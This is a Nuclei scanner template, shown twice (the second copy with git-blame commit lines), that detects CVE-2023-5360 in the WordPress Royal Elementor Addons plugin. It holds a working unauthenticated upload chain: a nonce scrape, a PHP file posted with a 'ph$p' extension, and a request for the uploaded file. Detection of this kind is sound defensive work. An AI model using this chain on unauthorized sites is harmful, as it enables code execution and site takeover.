nuclei-templates/http/cves/2023/CVE-2023-5360.yaml

id: CVE-2023-5360

info:
  name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
  remediation: Fixed in 1.3.79
  reference:
    - https://wordpress.org/plugins/royal-elementor-addons/
    - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5360
    - https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5360
    cwe-id: CWE-434
    epss-score: 0.86724
    epss-percentile: 0.98287
    cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: royal-elementor-addons
    product: royal_elementor_addons
    framework: wordpress
    publicwww-query: "/plugins/royal-elementor-addons/"
  tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
variables:
  file: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236

        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
        Content-Type: image/png

        <?php echo md5("CVE-2023-5360");?>
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="allowed_file_types"

        ph$p
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="triggering_event"

        click
        -----------------------------318949277012917151102295043236
        Content-Disposition: form-data; name="wpr_addons_nonce"

        {{nonce}}
        -----------------------------318949277012917151102295043236--
      - |
        GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "86398d3a90432d24901a7bbdcf1ab2ba"
        condition: and

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
        internal: true

      - type: regex
        name: filename
        part: body_2
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
        internal: true

# digest: 490a004630440220265a93b32a200d20ba9980e094463ec62dd1bb609417d7b8c557cfd426ed674802206117e9a213006ab57a57a8bd9eb54e7b58ce5c16049903bcaacac98cdc7468a2:922c64590222798bb761d5b6d8e72950
Create CVE-2023-5360.yaml 2023-10-17 09:00:45 +00:00			`id: CVE-2023-5360`

			`info:`
			`name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload`
			`author: theamanrawat`
			`severity: critical`
			`description: \|`
			`Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79`
TemplateMan Update [Wed Oct 18 16:27:25 UTC 2023] :robot: 2023-10-18 16:27:26 +00:00			`remediation: Fixed in 1.3.79`
Create CVE-2023-5360.yaml 2023-10-17 09:00:45 +00:00			`reference:`
			`- https://wordpress.org/plugins/royal-elementor-addons/`
			`- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-5360`
TemplateMan Update [Tue Oct 31 18:27:55 UTC 2023] :robot: 2023-10-31 18:27:55 +00:00			`- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34`
TemplateMan Update [Wed Nov 1 14:45:21 UTC 2023] :robot: 2023-11-01 14:45:21 +00:00			`classification:`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-5360`
			`cwe-id: CWE-434`
TemplateMan Update [Fri Nov 10 09:15:00 UTC 2023] :robot: 2023-11-10 09:15:01 +00:00			`epss-score: 0.86724`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00			`epss-percentile: 0.98287`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons::::::wordpress::*`
Create CVE-2023-5360.yaml 2023-10-17 09:00:45 +00:00			`metadata:`
			`verified: "true"`
minor update 2023-10-17 11:58:54 +00:00			`max-request: 3`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`vendor: royal-elementor-addons`
			`product: royal_elementor_addons`
			`framework: wordpress`
minor update 2023-10-17 11:58:54 +00:00			`publicwww-query: "/plugins/royal-elementor-addons/"`
			`tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive`
			`variables:`
			`file: "{{to_lower(rand_text_alpha(5))}}"`
Create CVE-2023-5360.yaml 2023-10-17 09:00:45 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236`

			`-----------------------------318949277012917151102295043236`
minor update 2023-10-17 11:58:54 +00:00			`Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"`
Create CVE-2023-5360.yaml 2023-10-17 09:00:45 +00:00			`Content-Type: image/png`

			`<?php echo md5("CVE-2023-5360");?>`
			`-----------------------------318949277012917151102295043236`
			`Content-Disposition: form-data; name="allowed_file_types"`

			`ph$p`
			`-----------------------------318949277012917151102295043236`
			`Content-Disposition: form-data; name="triggering_event"`

			`click`
			`-----------------------------318949277012917151102295043236`
			`Content-Disposition: form-data; name="wpr_addons_nonce"`

			`{{nonce}}`
			`-----------------------------318949277012917151102295043236--`
			`- \|`
			`GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_3`
			`words:`
			`- "86398d3a90432d24901a7bbdcf1ab2ba"`
			`condition: and`

			`- type: word`
			`part: header_3`
			`words:`
			`- "text/html"`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`name: nonce`
			`part: body_1`
			`group: 1`
			`regex:`
			`- 'WprConfig\s=\s{[^}]"nonce"\s:\s"([^"])"'`
			`internal: true`

			`- type: regex`
			`name: filename`
			`part: body_2`
			`group: 1`
			`regex:`
			`- 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'`
			`internal: true`
tags enhancements 2023-12-05 09:50:33 +00:00
Auto Template Signing [Mon Nov 27 10:10:24 UTC 2023] :robot: 2023-11-27 10:10:24 +00:00			`# digest: 490a004630440220265a93b32a200d20ba9980e094463ec62dd1bb609417d7b8c557cfd426ed674802206117e9a213006ab57a57a8bd9eb54e7b58ce5c16049903bcaacac98cdc7468a2:922c64590222798bb761d5b6d8e72950`